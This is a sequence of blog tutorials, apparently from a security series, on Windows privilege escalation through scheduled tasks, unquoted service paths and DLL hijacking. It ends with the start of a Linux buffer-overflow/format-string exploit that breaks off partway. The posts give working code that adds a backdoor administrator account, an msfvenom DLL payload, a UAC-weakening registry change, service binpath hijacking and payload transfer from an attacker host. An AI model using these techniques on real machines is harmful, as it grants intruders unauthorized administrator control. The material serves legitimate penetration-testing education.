In our ongoing exploration of Windows privilege escalation techniques, today&apos;s chapter delves into a technique centered around the misconfiguration of scheduled tasks. Similar in concept to Cron jobs on Linux, this approach is a prevalent method for gaining elevated access in Windows environments. We&apos;ll start with a high-level overview of the Windows Task Scheduler and its vulnerability exploitation. Following this, we&apos;ll guide you through creating a lab for hands-on practice, culminating in a proof-of-concept (POC) demonstration of privilege escalation using this technique.

# **Task Scheduler: The Gateway to Privilege Escalation**

The Windows Task Scheduler is a vital tool, enabling users to automate tasks such as program launches, script executions, and routine operations. It&apos;s particularly helpful for automating repetitive tasks like backups and scheduled updates. However, the scheduler&apos;s true potential and pitfalls lie in its configuration, especially regarding the binary paths it executes. These paths, if improperly configured, can become a vector for privilege escalation.

![](/content/images/2023/12/image-41.png)

Diagram of the attack

# **Lab Setup: Creating the Perfect Environment for Practice**

To begin our practical exploration, we&apos;ll create a directory to house our executable binary. This directory will be intentionally misconfigured to allow all &apos;Users&apos; group members to create or modify files, mimicking a common administrative oversight. This setup is crucial for practicing the escalation technique:

```powershell
mkdir &quot;C:\Program Files\Kayssel Archive\Task&quot;
New-Item -Name file.exe
icacls &quot;C:\Program Files\Kayssel Archive\Task&quot; /grant &quot;Users:(OI)(CI)W&quot;

```

![](/content/images/2023/12/image-33.png)

Modification so that everyone can write

Once the directory and the binary that will execute the task have been created, we are going to configure it. In my case I am going to create the task using the user beruinsect which is a user of the domain. I recommend following the process since I have been trying different ways, and it can give problems later when it comes to be able to detect the vulnerable task with the user that we are going to simulate the intrusion.

To initiate, launch the &quot;Task Scheduler&quot; application found via the Windows search bar. Once open, navigate to and select the &quot;Create Task&quot; option. Within the initial setup menu, several key configurations are required:

![](/content/images/2023/12/image-42.png)

Execution of the task schedule

![](/content/images/2023/12/image-44.png)

Create Task

In the first menu, you will select the following options:

**Task Execution Settings:** We&apos;ll set the task to start regardless of the user&apos;s login status. This approach is chosen to allow manual execution of the task for our privilege escalation proof of concept (POC), eliminating the need to wait for automatic triggers. Alternatively, you can select &quot;Run only when user is logged on&quot; to mimic a scenario where the task initiates upon an administrator&apos;s login.

**Assigning Execution Privileges:** Crucially, we&apos;ll assign task execution rights to an administrator. This step is pivotal for potential privilege escalation.

![](/content/images/2023/12/image-45.png)

Options selection

**User Selection for Task Execution:** To specify the executing user, select &quot;Change User&quot; from the provided menu options.

![](/content/images/2023/12/image-26.png)

Domain selection

![](/content/images/2023/12/image-39.png)

Execution as the administrator user

![](/content/images/2023/12/image-46.png)

Final configuration

**Scheduling the Task:** Our task will be set to execute every 5 minutes daily, achieved by adding a new trigger in the scheduler.

![](/content/images/2023/12/image-21.png)

Creation of the new trigger

![](/content/images/2023/12/image-22.png)

Launch every 5 minutes

**Action Configuration:** In the actions tab, choose the binary intended for repeated execution.

![](/content/images/2023/12/image-23.png)

Binary selection

![](/content/images/2023/12/image-24.png)

New action

Once this is done, we should see the task in the scheduler:

![](/content/images/2023/12/image-25.png)

Task created

Upon completing these configurations, the newly created task should be visible in the scheduler, marking the successful setup of our lab environment, ready for conducting privilege escalation experiments.

# **Attack Execution: Turning Theory into Practice**

Our primary objective in this phase is to escalate privileges to administrator level on the PC-BERU machine, assuming we have compromised the &apos;beruinsect&apos; user account.

## **Enumerating Scheduled Tasks**

To identify potential targets for escalation, we can start with manual enumeration through the Windows command line. Key information to focus on includes the execution path of the binary and its associated privileges, especially tasks running under administrative rights.

&lt;details&gt;
&lt;summary&gt;Utilize the following PowerShell command to list detailed task information:&lt;/summary&gt;

```powershell
schtasks /query /fo LIST /v

```
&lt;/details&gt;


![](/content/images/2023/12/image-47.png)

Obtaining task information

For more targeted results, filter tasks by name and privilege level:

```powershell
schtasks /query /fo LIST | Where-Object {$_ -like &quot;TaskName*&quot;} | select-string &quot;privilege&quot;

```

![](/content/images/2023/12/image-28.png)

&lt;details&gt;
&lt;summary&gt;Identifying the task name&lt;/summary&gt;

```powershell
schtasks /query /fo LIST /v  | where-object {$_ -match &quot;TaskName&quot; -or $_ -match &quot;Run As User&quot;}

```
&lt;/details&gt;


![](/content/images/2023/12/image-48.png)

Name of the task and privileges over which it runs

Additionally, as in previous chapters, Winpeas can be employed for a more automated detection of vulnerable tasks:

```powershell
.\winpeas | tee win_report.txt

```

![](/content/images/2023/12/image-32.png)

Detection of the vulnerable task with Winpeas

## **Modifying the Binary for Escalation**

Upon identifying a vulnerable task, the next step involves modifying the binary executed by the task. For demonstration, here&apos;s a simple C program designed to add a user with administrative privileges:

```c
#include &lt;stdlib.h&gt;

int main() {
  system(&quot;net user rsgbengi Password123 /add&quot;);
  system(&quot;net localgroup administrators rsgbengi /add&quot;);
}


```

&lt;details&gt;
&lt;summary&gt;Compile this program using:&lt;/summary&gt;

```bash
x86_64-w64-mingw32-gcc-win32 vuln.c -o vuln.exe

```
&lt;/details&gt;


Transfer the compiled binary to the target machine, replacing the original task binary. Ensure to back up the original file:

```powershell
cp file.exe file.bak
mv vuln.exe file.exe

```

![](/content/images/2023/12/image-35.png)

Replacing the original file

## **Executing the Modified Task**

If the lab is set up as described, execute the task from the scheduler. For tasks configured to run at user logon, re-login as the administrator.

![](/content/images/2023/12/image-51.png)

Execute the task

Post-execution, verify the creation of a new user in the administrators&apos; group, marking the success of the privilege escalation.

![](/content/images/2023/12/image-34.png)

Before to task execution

![](/content/images/2023/12/image-52.png)

After Execution

![](/content/images/2023/12/image-49.png)

Membership of the user rsgbengi in the administrators&apos; group

# **Conclusion: Mastering Scheduled Task Exploitation**

In this chapter, we navigated through the intricate process of exploiting scheduled task misconfigurations for privilege escalation on Windows. From understanding the basics of the Windows Task Scheduler to setting up a practical lab and executing a successful attack, we covered essential steps in identifying and exploiting this common vulnerability. This exploration not only equips you with a valuable skill in your cybersecurity toolkit but also deepens your understanding of system vulnerabilities and their implications. As we conclude this chapter, remember that the journey in cybersecurity is one of continuous learning, and each chapter brings new insights and techniques to master.

# Resources

[Windows Privilege Escalation: Scheduled Task/Job (T1573.005) - Hacking Articles](https://www.hackingarticles.in/windows-privilege-escalation-scheduled-task-job-t1573-005/)</content:encoded><author>Ruben Santos</author></item><item><title>Path to Power: Unleashing Windows Privileges through Unquoted Service Paths</title><link>https://www.kayssel.com/post/unquoted-service-path</link><guid isPermaLink="true">https://www.kayssel.com/post/unquoted-service-path</guid><description>Explore Unquoted Service Path, a Windows privilege escalation vulnerability. Learn to set up labs, use detection tools, and execute attacks for hands-on understanding and defense.</description><pubDate>Sun, 10 Dec 2023 16:44:15 GMT</pubDate><content:encoded># **Unveiling Unquoted Service Paths: An Introduction**

Welcome to another insightful exploration in our ongoing series about mastering privilege escalation in Windows environments. Today&apos;s focus is on the intriguing and often underexplored Unquoted Service Path vulnerability. This vulnerability, while common in Windows systems, offers a unique avenue for escalating privileges and understanding the inner workings of Windows service executions. In this chapter, we&apos;re going deeper than just a surface-level understanding. We’ll embark on a comprehensive journey, starting from the basics of what Unquoted Service Path vulnerability is, moving through the nuances of its exploitation, and culminating in the creation of a practical lab environment for hands-on learning.

Our aim is to provide a holistic view of this vulnerability - not just to exploit it, but to truly grasp the why and how behind its existence and usage. Additionally, we&apos;ll cover how to take complete control of services, turning them from mere system operations into powerful tools for system administration and security manipulation. Whether you&apos;re a seasoned security professional or a curious enthusiast, this chapter promises to enhance your skill set and deepen your understanding of Windows security. So, let&apos;s begin this adventure and uncover the secrets of Unquoted Service Path exploitation.

# **Decoding the Vulnerability: What is Unquoted Service Path?**

In the world of Windows operating systems, services are the unsung heroes, running silently in the background to perform a variety of tasks. When these services are installed, they&apos;re linked to a specific file path. However, there&apos;s a catch: if this file path, containing spaces, isn&apos;t wrapped in quotation marks, it opens up a security loophole. Windows, you see, reads the space as a command separator, paving the way for potential exploitation by attackers through service manipulation or executing harmful code. Here&apos;s a diagram to visualize the vulnerability:

![](/content/images/2023/12/image-15.png)

Vulnerability diagram

In this diagram, the service binary is &quot;vulnerable.exe&quot;, but due to spaces, Windows perceives multiple paths:

-   C:\\Program
-   C:\\Program Files\\Vuln
-   C:\\Program Files\\Vuln Service\\vulnerable.exe

If we have write access to any of these paths, it becomes a gateway for privilege escalation. For instance, with write permission on &quot;Program Files&quot;, we could create a file named &quot;Vuln.exe&quot; (as the next directory is &quot;Vuln Service&quot;) that would execute upon the service&apos;s launch. This is just the tip of the iceberg, though. To really get a handle on this, let&apos;s set up a lab environment!

# **Setting the Stage: Lab Preparation for Attack Simulation**

Let&apos;s start by creating a directory for our service-executed binary. Remember, these steps require administrator-level access:

```bash
mkdir &quot;C:\Program Files\Kayssel Archive\Vuln Service&quot;

```

Next, we assign write permissions to the Users group for this directory:

```bash
icacls &quot;C:\Program Files\Kayssel Archive&quot; /grant &quot;Users:(OI)(CI)W&quot;

```

This setup means any user in this group can now create files here, a crucial step for our privilege escalation practice. If we skip this, non-administrator users won&apos;t have the necessary file creation rights.

![](/content/images/2023/12/image-4.png)

Error running the service

Now, we need a program that can run as a service. I&apos;ve used this one from GitHub:

[GitHub - CoreProgramm/Windows-Service-Threading: In this CoreProgramm you find how to create and Install Windows Service using Threading class.](https://github.com/CoreProgramm/Windows-Service-Threading/tree/master)

It&apos;s a simple program that writes the date and time to a file in &quot;C:&quot;. The &quot;WindowsService.exe&quot; found in the repository&apos;s &quot;bin/debug&quot; will be our service binary, renamed as &quot;vulnerable.exe&quot;.

![](/content/images/2023/12/image-13.png)

Service Binary

After setting everything up, it&apos;s time to create the service. I used `sc.exe`, but you could also use PowerShell&apos;s &quot;New-Service&quot;:

```powershell
# Create a service with sc.exe
sc.exe create BadPath binPath= &quot;C:\Program Files\Kayssel Archive\Vuln Service\vulnerable.exe&quot; start= auto

# Create a service with New-Service
New-Service -Name &quot;BadPath&quot; -BinaryPathName &quot;C:\Program Files\Kayssel Archive\Vuln Service\vulnerable.exe&quot;


```

Once the service is created, we can manage it using PowerShell.

![](/content/images/2023/12/image-3.png)

Service management with PowerShell

To assign the required permissions for privilege escalation to a specific user, use this PowerShell script:

```powershell
# Intall it if you do not have the Carbon Module
Install-Module -Name &apos;Carbon&apos; -Force -AllowClobber

# Import the carbon module
Import-Module Carbon

# Define service name and user name
$serviceName = &quot;vulns&quot;
$userName = &quot;beruinsect&quot;

# Get the user&apos;s SID (security identifier)
$userSID = (New-Object System.Security.Principal.NTAccount($userName)).Translate([System.Security.Principal.SecurityIdentifier]).Value

#Grant permissions to start, stop and restart the service to the user.
Grant-ServicePermission -Name $serviceName -Identity $userName -FullControl

```

To avoid the vulnerability, the service path should be enclosed in quotes:

```powershell
sc create BadPath binPath= &quot;\&quot;C:\Program Files\Kayssel Archive\Vuln Service\vulnerable.exe\&quot;&quot; start= auto

New-Service -Name &quot;BadPath&quot; -BinaryPathName &apos;&quot;C:\Program Files\Kayssel Archive\Vuln Service\vulnerable.exe&quot;&apos;


```

While this corrects the path issue, it doesn&apos;t address the broader vulnerability due to the permissions granted to &quot;beruinsect&quot;. We&apos;ll explore this more towards the end of the chapter.

With the lab setup complete, let&apos;s move on to simulating a privilege escalation attack.

# **The Art of the Attack: Exploiting Unquoted Service Paths**

For this attack, I&apos;m using the user &quot;beruinsect&quot;, a standard user not in the administrators&apos; group. To detect the vulnerability, we can use Winpeas, just as we did with [DLL hijacking](https://www.kayssel.com/post/dll-hijacking/):

```powershell
.\winpeas.exe | tee win_report.txt

```

![](/content/images/2023/12/image-10.png)

Winpeas execution

&lt;details&gt;
&lt;summary&gt;Winpeas Execution and Results Filtering:&lt;/summary&gt;

```powershell
cat .\win_report.txt | select-string &quot;No quotes and space detected&quot;

```
&lt;/details&gt;


![](/content/images/2023/12/image-9.png)

Filtering of results

This will reveal the vulnerable path we created. Another tool for identifying escalation vectors is PowerUp, which you can find here:

[PowerTools/PowerUp/PowerUp.ps1 at master · PowerShellEmpire/PowerTools](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1)

&lt;details&gt;
&lt;summary&gt;PowerUp can be executed on the victim machine to detect vulnerable services:&lt;/summary&gt;

```powershell
# Import and execute PowerUp
Import-Module .\PowerUp.ps1
Get-ServiceUnquoted -Verbose
```
&lt;/details&gt;


![](/content/images/2023/12/image-12.png)

Vulnerable services detected by PowerUp

Additionally, you can manually inspect the services and their paths in PowerShell:

```powershell
Get-WmiObject -Query &quot;SELECT * FROM Win32_Service&quot; | Select-Object DisplayName, PathName

```

![](/content/images/2023/12/image-19.png)

&lt;details&gt;
&lt;summary&gt;Services and their corresponding path&lt;/summary&gt;

```powershell
Get-Service

```
&lt;/details&gt;


![](/content/images/2023/12/image-18.png)

Services

Once we&apos;ve located the vulnerable path, it&apos;s time to craft a binary that exploits this weakness. Here&apos;s a simple C program for creating a user with administrative rights:

```c
#include &lt;stdlib.h&gt;

int main() {
  system(&quot;net user rsgbengi Password123 /add&quot;);
  system(&quot;net localgroup administrators rsgbengi /add&quot;);
}

```

To compile the program, we can use the following command. It is important that we call the binary &quot;Vuln.exe&quot; as this will cause the malicious code to be executed when the vulnerable service is started.

```bash
x86_64-w64-mingw32-gcc-win32 vuln.c -o Vuln.exe

```

Transfer this binary to the target using a Python server and wget:

![](/content/images/2023/12/image-7.png)

Transfer of the file Vuln.exe

```powershell
wget http://192.168.1.146:9000/Vuln.exe -OutFile Vuln.exe

```

![](/content/images/2023/12/image-6.png)

Use wget to leave the file in the vulnerable path

After starting the service, an error might occur, but our malicious user will be created successfully. Verify the user&apos;s administrative privileges with Crackmapexec (remember to disable UAC as mentioned in the previous chapter).

![](/content/images/2023/12/image-8.png)

User created successfully

![](/content/images/2023/12/image-14.png)

Checking that the user has administrator privileges

# **Beyond the Attack: Understanding Broader Implications**

Our service configuration also exposes another flaw: giving a standard user full control over an administrator-level service can allow them to alter its functionality. For example, they could change the service to create another user with administrative privileges:

```powershell
sc.exe config &quot;BadPath&quot; binpath= &quot;net user stillVulnerable Password1 /add&quot;

```

![](/content/images/2023/12/image-17.png)

# **Wrapping Up: Key Takeaways and Next Steps**

As we wrap up this comprehensive chapter on Unquoted Service Path vulnerabilities in Windows, it&apos;s clear that we&apos;ve journeyed through a landscape rich in technical knowledge and practical application. From dissecting the very nature of this common yet critical vulnerability to setting up our own lab and executing a successful privilege escalation attack, we&apos;ve covered significant ground. This exploration has not only equipped us with the practical skills to exploit such vulnerabilities but also with the theoretical understanding to appreciate their intricacies.

What makes this journey invaluable is the balanced blend of theory and practice, providing a solid foundation for anyone looking to delve deeper into the world of cybersecurity, especially within Windows environments. As we continue to navigate through the vast and evolving terrain of cybersecurity, the insights gained in this chapter will undoubtedly be pivotal, be it in professional penetration testing, preparing for certifications like OSCP, or just enhancing personal knowledge.

Looking forward, the world of cybersecurity is ever-changing, and staying ahead means continuously learning and adapting. The skills and understanding developed here are not just end goals but stepping stones to more advanced techniques and strategies. So, stay curious, keep experimenting, and prepare for even more exciting chapters in this series, where we&apos;ll continue to unravel the complexities of cybersecurity together.

# Resources

[GitHub - CoreProgramm/Windows-Service-Threading: In this CoreProgramm you find how to create and Install Windows Service using Threading class.](https://github.com/CoreProgramm/Windows-Service-Threading/tree/master)

[Windows Privilege Escalation: Unquoted Service Path - Hacking Articles](https://www.hackingarticles.in/windows-privilege-escalation-unquoted-service-path/)</content:encoded><author>Ruben Santos</author></item><item><title>DLL Hijacking: Understanding, Detecting, and Exploiting Privilege Escalation on Windows</title><link>https://www.kayssel.com/post/dll-hijacking</link><guid isPermaLink="true">https://www.kayssel.com/post/dll-hijacking</guid><description>In this guide, we explore DLL hijacking for privilege escalation in Windows. It covers detecting vulnerabilities using Winpeas, creating a malicious DLL, and overcoming User Account Control (UAC) obstacles, demonstrating real-world implications.</description><pubDate>Sun, 03 Dec 2023 18:31:53 GMT</pubDate><content:encoded># Introduction

Welcome to an insightful exploration of privilege escalation within Active Directory environments, a critical aspect of modern cybersecurity. In this series, we delve into various techniques commonly employed for escalating privileges, ranging from those applicable to individual Windows machines to those more intricately linked to Active Directory itself.

Our journey begins with a focus on one of the most renowned methods: DLL hijacking. This chapter will enlighten you on what DLL hijacking entails, how it can be leveraged for privilege escalation, and methods to identify applications vulnerable to this exploit.

This series is designed to not only impart knowledge about these techniques but also to provide practical insights into their application and detection. With a blend of theory and hands-on examples, we aim to equip you with the skills necessary to navigate and secure complex Active Directory environments. So, let&apos;s embark on this educational journey together!

# **Understanding DLL Hijacking**

DLL hijacking, also known as &quot;DLL preloading&quot; or &quot;binary planting,&quot; is a security vulnerability where an executable program, like an application or service, loads a Dynamic Link Library (DLL) from an unspecific or uncontrolled location. To put it simply, it involves impersonating a DLL that an application expects to find but doesn&apos;t, due to it not being in the system. Windows searches for these missing DLLs along the paths defined in the &quot;PATH&quot; environment variable, which can be displayed using the command `echo %PATH%`.

![](/content/images/2023/11/image-107.png)

PATH environment variable

If the DLL is absent in the application&apos;s own path, Windows then looks for it in each of the PATH entries. Our goal is to identify applications searching for non-existent DLLs or DLLs in paths where we have write access. Once we find such a location, we create a malicious DLL to replace the missing one. This tactic becomes effective when the corresponding application service is restarted or executed by a user with higher privileges, enabling actions like privilege escalation. Notably, DLL hijacking can also be employed as a method for maintaining persistence on a machine, a topic we&apos;ll explore in a future series on red team techniques.

![](/content/images/2023/12/image.png)

Diagram of the Attack

# **Detecting DLL Hijacking Vulnerabilities**

Moving from theory to practice, let&apos;s explore how to detect DLL hijacking vulnerabilities on a machine. A widely-used tool for automating the detection of privilege escalation vectors is [Winpeas](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS). To utilize Winpeas, it first needs to be uploaded to the target machine. For this task, I&apos;ve employed Python to create an HTTP server and used wget on Windows to transfer the binary:

```powershell
wget http://192.168.1.146:9000/winpeas.exe -OutFile winpeas.exe

```

![](/content/images/2023/11/image-105.png)

Python server to pass files

After successfully uploading the file, execute it and save the results with the command:

```powershell
.\winpeas.exe | tee winpeas_report.txt

```

![](/content/images/2023/11/image-108.png)

Search for DLL hijacking

In our focus on DLL hijacking, we search for indications within the console output. In this instance, it shows that our user has full access to the &quot;dll\_privilege&quot; folder, suggesting the possibility of modifying DLLs within this directory, thereby impacting the associated application.

Additionally, we can leverage the Sysinternals Process Monitor tool to identify events related to missing DLLs. A deeper look into this tool and its application will be discussed in the upcoming section, providing further insights into understanding this vulnerability.

[Process Monitor - Sysinternals](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon)

# **Demonstrating DLL Hijacking**

To illustrate DLL hijacking, I&apos;ve developed a simple C program that searches for a specific DLL and reports its presence. The program&apos;s code is straightforward:

```c
#include &lt;windows.h&gt;
#include &lt;stdio.h&gt;

int main(void)
{
    HINSTANCE hDll;

    hDll = LoadLibrary(TEXT(&quot;vulnerable.dll&quot;));

    if (hDll != NULL)
    {
        printf(&quot;DLL Found\n&quot;);
    }
    else
    {
        printf(&quot;DLL Not found\n&quot;);
    }
}

```

In conjunction with this, the targeted DLL, when loaded, displays a confirmation message:

```c
#include &lt;windows.h&gt;

BOOL WINAPI DllMain (HANDLE hDLL, DWORD dwReason, LPVOID lpReserved) {
    switch (dwReason){
        case DLL_PROCESS_ATTACH:
            MessageBox(NULL,&quot;DLL Loaded!&quot;,&quot;Dll example&quot;,MB_ICONERROR | MB_OK);
            break;

    }
    return TRUE;
}

```

To compile both components, the following commands are used:

```bash
x86_64-w64-mingw32-gcc-win32 vulnerable.c -o vulnerable.exe
x86_64-w64-mingw32-gcc-win32 lib.c -o vulnerable.dll -shared

```

After compiling the binary, our next step is to transfer it to the target machine for testing. When we execute the binary without the accompanying DLL, an interesting observation emerges: the application explicitly reports that the DLL is not found.

![](/content/images/2023/11/image-110.png)

DLL not found

To delve deeper into the application&apos;s behavior and the events it triggers, we turn to Process Monitor. By utilizing this tool, we can apply two specific filters: one to identify missing values and another to highlight files ending in &quot;.dll&quot;.

![](/content/images/2023/11/image-94.png)

Upon applying these filters in Process Monitor, we&apos;re able to observe a revealing outcome. A log is generated, clearly indicating that the &quot;vulnerable.dll&quot; library, which our application is attempting to access, could not be found.

![](/content/images/2023/11/image-95.png)

Process Monitor events archieved

While this technique effectively identifies missing DLLs, it&apos;s primarily used for practice and demonstration purposes. In real-world scenarios, especially on compromised machines, we typically wouldn&apos;t have Process Monitor pre-installed.

Conversely, when the DLL is present, the process yields a different result: a message promptly appears, confirming that the DLL has been successfully loaded.

![](/content/images/2023/11/image-109.png)

DLL loaded successfully

For demonstration purposes, let&apos;s consider a scenario where the DLL is not found. In such a case, we have the option to create a malicious DLL. A popular tool for this is msfvenom. As an example, using the following command, we can craft a DLL that, when executed, launches the calculator application.

```bash
msfvenom -p windows/x64/exec  CMD=calc.exe -f dll -o vulnerable.dll

```

![](/content/images/2023/11/image-96.png)

Once we transfer this malicious DLL to the machine, the next phase of our demonstration unfolds. By executing the program, we can observe the payload in action.

![](/content/images/2023/11/image-93.png)

# **Lab Scenario for Privilege Escalation**

In our lab setup, I created a folder named &quot;dll\_privilege&quot; to house the application. This folder is typically accessible only by administrators. However, due to a configuration error by one of them, the user &quot;beruinsect&quot; now has full access.

![](/content/images/2023/11/image-111.png)

Vulnerable application

To replicate this scenario, the following commands were used:

```powershell
icacls &quot;C:\Program Files\dll_privilege&quot; /grant beruinsect@shadow:F

```

![](/content/images/2023/11/image-99.png)

Privileges in the folder

These commands grant the &apos;beruinsect&apos; user comprehensive write, read, and execute permissions.

# **Demonstrating the Attack**

Imagine we&apos;ve run Winpeas and discovered that &apos;beruinsect&apos; has full access to &quot;C:\\Program Files\\dll\_privilege&quot;. Within this directory, there&apos;s an application searching for a missing &quot;vulnerable.dll&quot;. This situation is ripe for a DLL hijacking attack, which could enable privilege escalation when an administrator executes the application.

Our approach involves creating a malicious DLL that adds a user to the administrators&apos; group. Here&apos;s the code for the malicious DLL and its compilation process:

```c
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
    switch(dwReason){
        case DLL_PROCESS_ATTACH:
            system(&quot;net user rsgbengi Password123 /add&quot;);
            system(&quot;net localgroup administrators rsgbengi /add&quot;);
            break;
        case DLL_PROCESS_DETACH:
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}

```

```bash
x86_64-w64-mingw32-gcc-win32 evil_lib.c -o vulnerable.dll -shared

```

This code leverages the &quot;system&quot; function to create a user with administrator rights. As the attacker, we would transfer this malicious DLL to the application&apos;s folder on the victim machine.

![](/content/images/2023/11/image-112.png)

Writing the malicious DLL

Upon execution by an administrator, our embedded commands in the DLL are activated, successfully escalating privileges, as illustrated in the accompanying image.

![](/content/images/2023/11/image-103.png)

Successful privilege escalation

## **Considering User Account Control (UAC)**

It&apos;s important to note that running crackmapexec might not show the &quot;pwn!&quot; status due to active UAC. This Windows features prompts for permission when running tasks requiring higher privileges.

![](/content/images/2023/11/image-115.png)

User created does not show as &quot;Pwn&quot;.

![](/content/images/2023/11/image-114.png)

UAC sample

To circumvent this, the following command can be used, and it can also be incorporated into the malicious DLL:

```powershell
reg add &quot;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System&quot; /v &quot;LocalAccountTokenFilterPolicy&quot; /t REG_DWORD /d 1 /f

```

Executing this command should alter the UAC status, enabling full administrative access for the newly created user. Additionally, tools like psexec can be used for remote command execution.

![](/content/images/2023/11/image-117.png)

Disabling UAC

![](/content/images/2023/11/image-116.png)

Crackmapexec showing user as administrator

# Conclusions

In this exploration, we have delved into the intricate world of DLL hijacking, a pivotal technique in the realm of privilege escalation on Windows systems. Through our hands-on lab scenario, we have demonstrated the creation and deployment of a malicious DLL, revealing how seemingly minor oversights in system configurations can lead to significant security vulnerabilities.

Our journey highlighted the importance of tools like Winpeas for vulnerability detection and showcased the practical implications of executing a DLL hijacking attack. We also touched on the nuances of User Account Control (UAC) and how its settings can impact the success of such exploits.

As we conclude, it&apos;s evident that understanding and mitigating DLL hijacking is crucial in fortifying Windows environments against privilege escalation attacks. This chapter serves as a testament to the need for continuous vigilance and skill development in cybersecurity, preparing us for more advanced techniques in upcoming series.

# Resources

[DLL Hijacking — Part 1 : Basics](https://medium.com/techzap/dll-hijacking-part-1-basics-b6dfb8260cf1)

[GitHub - tothi/dll-hijack-by-proxying: Exploiting DLL Hijacking by DLL Proxying Super Easily](https://github.com/tothi/dll-hijack-by-proxying)</content:encoded><author>Ruben Santos</author></item><item><title>Mastering Binary Exploitation: Unleashing the Power of Format String and Buffer Overflow</title><link>https://www.kayssel.com/post/format-string-and-buffer-overflow</link><guid isPermaLink="true">https://www.kayssel.com/post/format-string-and-buffer-overflow</guid><description>In this chapter, we explore binary exploitation, focusing on buffer overflow and format string vulnerabilities. Using radare2, we pinpoint key memory addresses and adjust character counts in our exploit, overcoming challenges like unexpected compiler behavior.</description><pubDate>Tue, 21 Nov 2023 20:42:00 GMT</pubDate><content:encoded># **Introduction**

Welcome to the latest installment of our series on binary exploitation in Linux. Today, we delve deeper into this intriguing world, building on our previous exploration of format strings. In this chapter, we&apos;re set to embark on a fascinating journey: simultaneously exploiting multiple vulnerabilities. Specifically, we&apos;ll tackle both buffer overflow and format string vulnerabilities, demonstrating the intricate dance of exploiting these flaws in unison.

Our adventure today is not just about exploiting vulnerabilities; it&apos;s also a deep dive into the art of code analysis using radare2. This exploration will empower you to navigate through various challenges that might arise during exploit development, challenges often stemming from unexpected compiler behaviors.

So, buckle up and prepare for an insightful journey as we unravel the complexities of binary exploitation, step by step. Let&apos;s dive in!

# **Exploring the Vulnerable Code**

Let&apos;s dive into the heart of our discussion by examining a piece of vulnerable code. This code, while simple in function, opens the door to deeper concepts of binary exploitation.

```c
int main(int argv,char **argc) {
	short int zero=0;
	int *plen=(int*)malloc(sizeof(int));
	char buf[256];

	strcpy(buf,argc[1]);
	printf(&quot;%s%hn\n&quot;,buf,plen);
	while(zero);
}

```

## **How to Compile the Code**

For those who are following along, here&apos;s the command to compile this code. As always, we maintain our consistency with the compilation process.

```bash
gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o vulnerable vulnerable.c

```

## **Understanding the Code Dynamics**

What we&apos;ve got here is a straightforward piece of code that takes user input and displays it. Let&apos;s break down its mechanics:

1.  **Buffer Allocation:** A buffer, `buf`, is allocated. It&apos;s a storage for user input, which we fetch through the `strcpy` function. However, there&apos;s no check on the input size, hinting at a potential buffer overflow vulnerability.
2.  **Loop Control Variable:** There&apos;s a variable `zero` which plays a crucial role in controlling the program&apos;s exit. If `zero` is altered, it disrupts the flow, leading to an infinite loop.
3.  **Memory Manipulation Pointer:** Then, there&apos;s `plen`. This pointer is interesting. It writes the count of characters, printed by `printf`, into the memory. The format specifier `%hn` is key here; it writes in 2 bytes instead of the usual 4 bytes with `%n`. This peculiar use of the format string opens avenues for memory data manipulation.

**A Note on Stack Status:** It&apos;s important to remember that the actual stack status might vary in practice, which we will explore as we progress.

![](/content/images/2023/11/image-42.png)

Stack status in the function

# **Crafting the Attack Strategy**

Our primary goal with this exploit, as with many others, is to cleverly execute code by leveraging the design of the program. Let&apos;s explore our approach:

1.  **Buffer Overflow Consideration:** The most straightforward tactic might seem to be a buffer overflow attack to alter the return address. However, this strategy has a catch. If we follow this path, we inadvertently change the value of `zero`, leading to an infinite loop as the program never terminates.
2.  **Challenges with Direct Injection:** One might consider directly injecting &quot;0000&quot; at the memory location of `zero`. But, there&apos;s a twist: in ASCII, &quot;0000&quot; translates to 0x30303030 in memory, not the desired effect.

**How to Navigate These Challenges?** We&apos;ll split our approach into two critical steps:

-   **Step 1: Utilizing Buffer Overflow:** Firstly, we&apos;ll use the buffer overflow vulnerability to our advantage. This involves adjusting variable values to our desired figures and altering the return address to control the program&apos;s flow. Additionally, we&apos;ll insert a shellcode within the buffer, setting the stage for executing our code.
-   **Step 2: Avoiding the Infinite Loop:** To prevent falling into an infinite loop by modifying `zero`, we&apos;ll employ the pointer `plen`. By manipulating the memory address where `plen` points (directing it to `zero`), we can use the `printf` function and `%hn` to inject our preferred value into memory. In our case, this value is &quot;00&quot;, ensuring the program doesn&apos;t end in an infinite loop. It&apos;s essential to align the number of characters printed by `printf` with our goal - here, translating to binary &quot;00&quot;.

**Visualizing the Strategy:**

![](/content/images/2023/11/image-40.png)

Attack strategy

# **Building the Exploit Step-by-Step**

Developing an exploit requires a meticulous approach. Let&apos;s walk through the stages of crafting our exploit, ensuring we manipulate the `zero` variable effectively.

The success of our exploit critically hinges on the precision of character count. Our objective is to strategically inject &quot;00&quot; into the `zero` variable, necessitating the printing of exactly 65536 characters, which corresponds to 0x10000 in hexadecimal. In this endeavor, we utilize the `strcpy` function, specifically employing `argc[1]`, as our method for altering the memory&apos;s state. This meticulous attention to the number of characters is crucial, as it ensures our exploit precisely manipulates the memory to achieve the desired outcome.

![](/content/images/2023/11/image-44.png)

Characters to be displayed on the screen

Next, we turn to radare2 for debugging purposes. By opening and parsing the executable with this tool, our aim is to precisely pinpoint the address of the `buf` variable. This step is crucial as it allows us to understand exactly where our injected data resides in memory, setting the stage for the subsequent steps in our exploit development process.

```bash
r2 ./vulnerable
aaa

```

Setting a breakpoint at the `strcpy` function, we prepare to run our crafted payload:

```bash
db &lt;address&gt;

```

![](/content/images/2023/11/image-46.png)

Breaking point

&lt;details&gt;
&lt;summary&gt;Our initial payload looks like this:&lt;/summary&gt;

```python
from pwn import * 
import sys

payload = b&apos;A&apos;*65536
sys.stdout.buffer.write(payload)

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;Executing it in radare2:&lt;/summary&gt;

```bash
ood &quot;`!python3 exploit.py`&quot;

```
&lt;/details&gt;


